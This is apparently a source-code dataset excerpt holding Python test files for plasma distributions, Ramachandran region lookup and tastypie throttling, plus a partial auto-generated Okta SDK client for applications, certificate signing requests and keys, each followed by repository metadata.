assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_zero_drift_units(self):
"""
Testing inputting drift equal to 0 with units. These should just
get passed and not have extra units applied to them.
"""
distFunc = kappa_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
kappa=self.kappa,
particle=self.particle,
vx_drift=self.vx_drift,
vy_drift=self.vy_drift,
vz_drift=self.vz_drift,
units="units",
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_value_drift_units(self):
"""
Testing vdrifts with values
"""
testVal = 1.2376545373917465e-13
distFunc = kappa_velocity_3D(
vx=self.vx,
vy=self.vy,
vz=self.vz,
T=self.T,
kappa=self.kappa,
particle=self.particle,
vx_drift=self.vx_drift2,
vy_drift=self.vy_drift2,
vz_drift=self.vz_drift2,
units="units",
)
errStr = f"Distribution function should be {testVal} and not {distFunc}."
assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
| 34.00365
| 88
| 0.544381
| 5,597
| 46,585
| 4.435769
| 0.040021
| 0.081363
| 0.055585
| 0.062029
| 0.961775
| 0.960164
| 0.957707
| 0.954042
| 0.946027
| 0.942321
| 0
| 0.0276
| 0.353676
| 46,585
| 1,369
| 89
| 34.028488
| 0.796971
| 0.185661
| 0
| 0.834356
| 0
| 0
| 0.113488
| 0
| 0
| 0
| 0
| 0
| 0.06135
| 1
| 0.074642
| false
| 0
| 0.007157
| 0
| 0.091002
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a25ac858ed06e45c3308468c609b2e361f48812
| 5,309
|
py
|
Python
|
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
mmtbx/validation/regression/tst_find_region_max_value.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
from mmtbx.validation.ramalyze import find_region_max_value
from mmtbx.validation.ramalyze import RAMA_GENERAL, RAMA_GLYCINE, RAMA_CISPRO, \
RAMA_TRANSPRO, RAMA_PREPRO, RAMA_ILE_VAL
def exercise_1():
# ((-63.0, -43.0), 1.0)
print find_region_max_value(RAMA_GENERAL, -100,0)
assert find_region_max_value(RAMA_GENERAL, -100,0) == ((-63.0, -43.0), 1.0)
assert find_region_max_value(RAMA_GENERAL, -120, 40) == ((-63.0, -43.0), 1.0)
assert find_region_max_value(RAMA_GENERAL, -45, -55) == ((-63.0, -43.0), 1.0)
assert find_region_max_value(RAMA_GENERAL, 0, 0) == None
# ((-115.0, 131.0), 0.57068)
assert find_region_max_value(RAMA_GENERAL, -80, 100) == ((-115.0, 131.0), 0.57068)
assert find_region_max_value(RAMA_GENERAL, -160, 179) == ((-115.0, 131.0), 0.57068)
assert find_region_max_value(RAMA_GENERAL, -80, 60) == ((-115.0, 131.0), 0.57068)
assert find_region_max_value(RAMA_GENERAL, -120, -179) == ((-115.0, 131.0), 0.57068)
# ((53.0, 43.0), 0.323004)
assert find_region_max_value(RAMA_GENERAL, 60, 40) == ((53.0, 43.0), 0.323004)
assert find_region_max_value(RAMA_GENERAL, 75, 0) == ((53.0, 43.0), 0.323004)
assert find_region_max_value(RAMA_GENERAL, 60, 60) == ((53.0, 43.0), 0.323004)
# ((53.0, -127.0), 0.0246619)
assert find_region_max_value(RAMA_GENERAL, 53, -127) == ((53.0, -127.0), 0.0246619)
assert find_region_max_value(RAMA_GENERAL, 54, -128) == ((53.0, -127.0), 0.0246619)
assert find_region_max_value(RAMA_GENERAL, 53, -130) == ((53.0, -127.0), 0.0246619)
print "=================================================="
# ((-63.0, -41.0), 1.0)
assert find_region_max_value(RAMA_GLYCINE, -80, -20) == ((-63.0, -41.0), 1.0)
assert find_region_max_value(RAMA_GLYCINE, -80, 60) == ((-63.0, -41.0), 1.0)
assert find_region_max_value(RAMA_GLYCINE, -80, 65) == ((-63.0, -41.0), 1.0)
# ((63.0, 41.0), 1.0)
assert find_region_max_value(RAMA_GLYCINE, 80, 0) == ((63.0, 41.0), 1.0)
assert find_region_max_value(RAMA_GLYCINE, 80, -60) == ((63.0, 41.0), 1.0)
# ((79.0, -173.0), 0.553852)
assert find_region_max_value(RAMA_GLYCINE, 100, -160) == ((79.0, -173.0), 0.553852)
assert find_region_max_value(RAMA_GLYCINE, 120, 160) == ((79.0, -173.0), 0.553852)
assert find_region_max_value(RAMA_GLYCINE, -100, 140) == ((79.0, -173.0), 0.553852)
assert find_region_max_value(RAMA_GLYCINE, -100, -160) == ((79.0, -173.0), 0.553852)
print "=================================================="
# ((-89.0, 5.0), 0.701149)
assert find_region_max_value(RAMA_CISPRO, -80, 0) == ((-89.0, 5.0), 0.701149)
assert find_region_max_value(RAMA_CISPRO, -60, -20) == ((-89.0, 5.0), 0.701149)
assert find_region_max_value(RAMA_CISPRO, -100, 40) == ((-89.0, 5.0), 0.701149)
# ((-75.0, 155.0), 1.0)
assert find_region_max_value(RAMA_CISPRO, -80, 140) == ((-75.0, 155.0), 1.0)
assert find_region_max_value(RAMA_CISPRO, -80, -178) == ((-75.0, 155.0), 1.0)
print "=================================================="
# ((-57.0, -37.0), 0.99566)
assert find_region_max_value(RAMA_TRANSPRO, -60, -20) == ((-57.0, -37.0), 0.99566)
assert find_region_max_value(RAMA_TRANSPRO, -80, 0) == ((-57.0, -37.0), 0.99566)
assert find_region_max_value(RAMA_TRANSPRO, -40, -40) == ((-57.0, -37.0), 0.99566)
# ((-81.0, 65.0), 0.0896269)
assert find_region_max_value(RAMA_TRANSPRO, -80, 60) == ((-81.0, 65.0), 0.0896269)
# ((-59.0, 143.0), 1.0)
assert find_region_max_value(RAMA_TRANSPRO, -60, 140) == ((-59.0, 143.0), 1.0)
assert find_region_max_value(RAMA_TRANSPRO, -80, -179) == ((-59.0, 143.0), 1.0)
print "=================================================="
# ((-70.1, 149.0), 0.9619998)
assert find_region_max_value(RAMA_PREPRO, -120, 140) == ((-67.0, 147.0), 0.992025)
assert find_region_max_value(RAMA_PREPRO, -120, 60) == ((-67.0, 147.0), 0.992025)
assert find_region_max_value(RAMA_PREPRO, -160, 80) == ((-67.0, 147.0), 0.992025)
assert find_region_max_value(RAMA_PREPRO, -160, 160) == ((-67.0, 147.0), 0.992025)
# ((-57.0, -45.0), 1.0)
assert find_region_max_value(RAMA_PREPRO, -60, -40) == ((-57.0, -45.0), 1.0)
assert find_region_max_value(RAMA_PREPRO, -45, -55) == ((-57.0, -45.0), 1.0)
# ((49.0, 57.0), 0.185259)
assert find_region_max_value(RAMA_PREPRO, 49, 57) == ((49.0, 57.0), 0.185259)
assert find_region_max_value(RAMA_PREPRO, 60, 60) == ((49.0, 57.0), 0.185259)
assert find_region_max_value(RAMA_PREPRO, 55, 55) == ((49.0, 57.0), 0.185259)
print "=================================================="
# ((-63.0, -45.0), 1.0)
assert find_region_max_value(RAMA_ILE_VAL, -60, -40) == ((-63.0, -45.0), 1.0)
assert find_region_max_value(RAMA_ILE_VAL, -120, -60) == ((-63.0, -45.0), 1.0)
assert find_region_max_value(RAMA_ILE_VAL, -120, 20) == ((-63.0, -45.0), 1.0)
assert find_region_max_value(RAMA_ILE_VAL, -80, 0) == ((-63.0, -45.0), 1.0)
# ((-121.0, 129.0), 0.76163)
assert find_region_max_value(RAMA_ILE_VAL, -100, 140) == ((-121.0, 129.0), 0.76163)
assert find_region_max_value(RAMA_ILE_VAL, -160, 140) == ((-121.0, 129.0), 0.76163)
assert find_region_max_value(RAMA_ILE_VAL, -60, 140) == ((-121.0, 129.0), 0.76163)
assert find_region_max_value(RAMA_ILE_VAL, -130, -179) == ((-121.0, 129.0), 0.76163)
if __name__ == '__main__':
exercise_1()
| 55.884211
| 86
| 0.619326
| 923
| 5,309
| 3.302275
| 0.087757
| 0.173885
| 0.22605
| 0.312992
| 0.89895
| 0.877297
| 0.821522
| 0.814961
| 0.759186
| 0.757874
| 0
| 0.219175
| 0.127708
| 5,309
| 94
| 87
| 56.478723
| 0.438998
| 0.078358
| 0
| 0.078125
| 0
| 0
| 0.052923
| 0.051282
| 0
| 0
| 0
| 0
| 0.796875
| 0
| null | null | 0
| 0.046875
| null | null | 0.09375
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6a275f1e924eb96e8737876c7d9814c3b0822ab5
| 6,262
|
py
|
Python
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 1
|
2015-05-20T16:20:43.000Z
|
2015-05-20T16:20:43.000Z
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 3
|
2016-10-25T12:00:28.000Z
|
2022-02-10T10:04:24.000Z
|
tests/core/tests/throttle.py
|
uditagarwal/tastypie
|
ece398310040e9ddfeeacee6a699beb1dee6dad6
|
[
"BSD-3-Clause"
] | 1
|
2019-09-29T04:13:39.000Z
|
2019-09-29T04:13:39.000Z
|
import time
from django.core.cache import cache
from django.test import TestCase
from django.utils.encoding import force_text
from tastypie.models import ApiAccess
from tastypie.throttle import BaseThrottle, CacheThrottle, CacheDBThrottle
class NoThrottleTestCase(TestCase):
def test_init(self):
throttle_1 = BaseThrottle()
self.assertEqual(throttle_1.throttle_at, 150)
self.assertEqual(throttle_1.timeframe, 3600)
self.assertEqual(throttle_1.expiration, 604800)
throttle_2 = BaseThrottle(throttle_at=50, timeframe=60*30, expiration=1)
self.assertEqual(throttle_2.throttle_at, 50)
self.assertEqual(throttle_2.timeframe, 1800)
self.assertEqual(throttle_2.expiration, 1)
def test_convert_identifier_to_key(self):
throttle_1 = BaseThrottle()
self.assertEqual(throttle_1.convert_identifier_to_key(''), '_accesses')
self.assertEqual(throttle_1.convert_identifier_to_key('alnum10'), 'alnum10_accesses')
self.assertEqual(throttle_1.convert_identifier_to_key('Mr. Pants'), 'Mr.Pants_accesses')
self.assertEqual(throttle_1.convert_identifier_to_key('Mr_Pants'), 'Mr_Pants_accesses')
self.assertEqual(throttle_1.convert_identifier_to_key('%^@@$&!a'), 'a_accesses')
def test_should_be_throttled(self):
throttle_1 = BaseThrottle()
self.assertEqual(throttle_1.should_be_throttled('foobaz'), False)
def test_accessed(self):
throttle_1 = BaseThrottle()
self.assertEqual(throttle_1.accessed('foobaz'), None)
class CacheThrottleTestCase(TestCase):
def tearDown(self):
cache.delete('daniel_accesses')
cache.delete('cody_accesses')
def test_throttling(self):
throttle_1 = CacheThrottle(throttle_at=2, timeframe=5, expiration=2)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 0)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 1)
self.assertEqual(cache.get('cody_accesses'), None)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.accessed('cody'), None)
self.assertEqual(throttle_1.should_be_throttled('cody'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 2)
self.assertEqual(len(cache.get('cody_accesses')), 1)
# THROTTLE'D!
self.assertEqual(throttle_1.should_be_throttled('daniel'), True)
self.assertEqual(len(cache.get('daniel_accesses')), 2)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.should_be_throttled('daniel'), True)
self.assertEqual(len(cache.get('daniel_accesses')), 3)
self.assertEqual(throttle_1.accessed('daniel'), None)
# Should be no interplay.
self.assertEqual(throttle_1.should_be_throttled('cody'), False)
self.assertEqual(throttle_1.accessed('cody'), None)
# Test the timeframe.
time.sleep(3)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 0)
class CacheDBThrottleTestCase(TestCase):
def tearDown(self):
cache.delete('daniel_accesses')
cache.delete('cody_accesses')
def test_throttling(self):
throttle_1 = CacheDBThrottle(throttle_at=2, timeframe=5, expiration=2)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 0)
self.assertEqual(ApiAccess.objects.count(), 0)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 0)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 1)
self.assertEqual(cache.get('cody_accesses'), None)
self.assertEqual(ApiAccess.objects.count(), 1)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 1)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.accessed('cody'), None)
self.assertEqual(throttle_1.should_be_throttled('cody'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 2)
self.assertEqual(len(cache.get('cody_accesses')), 1)
self.assertEqual(ApiAccess.objects.count(), 3)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 2)
self.assertEqual(throttle_1.accessed('cody'), None)
# THROTTLE'D!
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.should_be_throttled('daniel'), True)
self.assertEqual(len(cache.get('daniel_accesses')), 3)
self.assertEqual(ApiAccess.objects.count(), 5)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 3)
self.assertEqual(throttle_1.accessed('daniel'), None)
self.assertEqual(throttle_1.should_be_throttled('daniel'), True)
self.assertEqual(len(cache.get('daniel_accesses')), 4)
self.assertEqual(ApiAccess.objects.count(), 6)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
# Should be no interplay.
self.assertEqual(throttle_1.should_be_throttled('cody'), True)
self.assertEqual(throttle_1.accessed('cody'), None)
self.assertEqual(ApiAccess.objects.count(), 7)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
# Test the timeframe.
time.sleep(3)
self.assertEqual(throttle_1.should_be_throttled('daniel'), False)
self.assertEqual(len(cache.get('daniel_accesses')), 0)
self.assertEqual(ApiAccess.objects.count(), 7)
self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
class ModelTestCase(TestCase):
def test_unicode(self):
access = ApiAccess(identifier="testing", accessed=0)
self.assertEqual(force_text(access), 'testing @ 0')
| 44.098592
| 96
| 0.701054
| 738
| 6,262
| 5.761518
| 0.109756
| 0.25047
| 0.216369
| 0.208843
| 0.805268
| 0.780809
| 0.771402
| 0.752117
| 0.639699
| 0.603716
| 0
| 0.022252
| 0.167518
| 6,262
| 141
| 97
| 44.411348
| 0.793401
| 0.017726
| 0
| 0.576923
| 0
| 0
| 0.098486
| 0
| 0
| 0
| 0
| 0
| 0.682692
| 1
| 0.086538
| false
| 0
| 0.057692
| 0
| 0.182692
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6a497773f8b8fe4140b0f5abb4f0c87c2a1a538c
| 46,828
|
py
|
Python
|
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | 1
|
2021-07-07T15:04:14.000Z
|
2021-07-07T15:04:14.000Z
|
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | null | null | null |
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | 1
|
2022-01-19T09:29:14.000Z
|
2022-01-19T09:29:14.000Z
|
"""
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from urllib.parse import urlencode
from okta.http_client import HTTPClient
from okta.models.application\
import Application
from okta.models.csr\
import Csr
from okta.models.json_web_key\
import JsonWebKey
from okta.models.o_auth_2_scope_consent_grant\
import OAuth2ScopeConsentGrant
from okta.models.application_group_assignment\
import ApplicationGroupAssignment
from okta.models.o_auth_2_token\
import OAuth2Token
from okta.models.app_user\
import AppUser
from okta.utils import format_url
from okta.api_client import APIClient
from okta.constants import find_app_model
class ApplicationClient(APIClient):
"""
A Client object for the Application resource.
"""
def __init__(self):
self._base_url = ""
async def list_applications(
self, query_params={}
):
"""
Enumerates apps added to your organization with paginat
ion. A subset of apps can be returned that match a supp
orted filter expression or query.
Args:
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.filter] {str}
[query_params.expand] {str}
[query_params.includeNonDeleted] {str}
Returns:
list: Collection of Application instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(
find_app_model(item["signOnMode"], item["name"])(
self.form_response_body(item)
)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def create_application(
self, application, query_params={}
):
"""
Adds a new application to your Okta organization.
Args:
{application}
query_params {dict}: Map of query parameters for request
[query_params.activate] {str}
Returns:
Application
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
if isinstance(application, dict):
body = application
else:
body = application.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application(
self, appId
):
"""
Removes an inactive application.
Args:
app_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application(
self, appId, query_params={}
):
"""
Fetches an application from your Okta organization by `
id`.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
Application
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_application(
self, appId, application
):
"""
Updates an application in your organization.
Args:
app_id {str}
{application}
Returns:
Application
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
if isinstance(application, dict):
body = application
else:
body = application.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_csrs_for_application(
self, appId
):
"""
Enumerates Certificate Signing Requests for an applicat
ion
Args:
app_id {str}
Returns:
list: Collection of Csr instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(Csr(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def generate_csr_for_application(
self, appId, csr_metadata
):
"""
Generates a new key pair and returns the Certificate Si
gning Request for it.
Args:
app_id {str}
{csr_metadata}
Returns:
Csr
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs
""")
if isinstance(csr_metadata, dict):
body = csr_metadata
else:
body = csr_metadata.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = Csr(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_csr_from_application(
self, appId, csrId
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}
Args:
app_id {str}
csr_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_csr_for_application(
self, appId, csrId
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}
Args:
app_id {str}
csr_id {str}
Returns:
Csr
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = Csr(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_cer_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
if isinstance(string, dict):
body = string
else:
body = string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/x-x509-ca-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_cer_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/x-x509-ca-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_der_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
if isinstance(string, dict):
body = string
else:
body = string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/pkix-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_der_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/pkix-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_pem_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/x-pem-file"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_keys(
self, appId
):
"""
Enumerates key credentials for an application
Args:
app_id {str}
Returns:
list: Collection of JsonWebKey instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(JsonWebKey(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def generate_application_key(
self, appId, query_params={}
):
"""
Generates a new X.509 certificate for an application ke
y credential
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.validityYears] {str}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/generate
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_application_key(
self, appId, keyId
):
"""
Gets a specific application key credential by kid
Args:
app_id {str}
key_id {str}
Returns:
JsonWebKey
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/{keyId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def clone_application_key(
self, appId, keyId, query_params={}
):
"""
Clones a X.509 certificate for an application key crede
ntial from a source application to target application.
Args:
app_id {str}
key_id {str}
query_params {dict}: Map of query parameters for request
[query_params.targetAid] {str}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/{keyId}/clone
""")
if query_params:
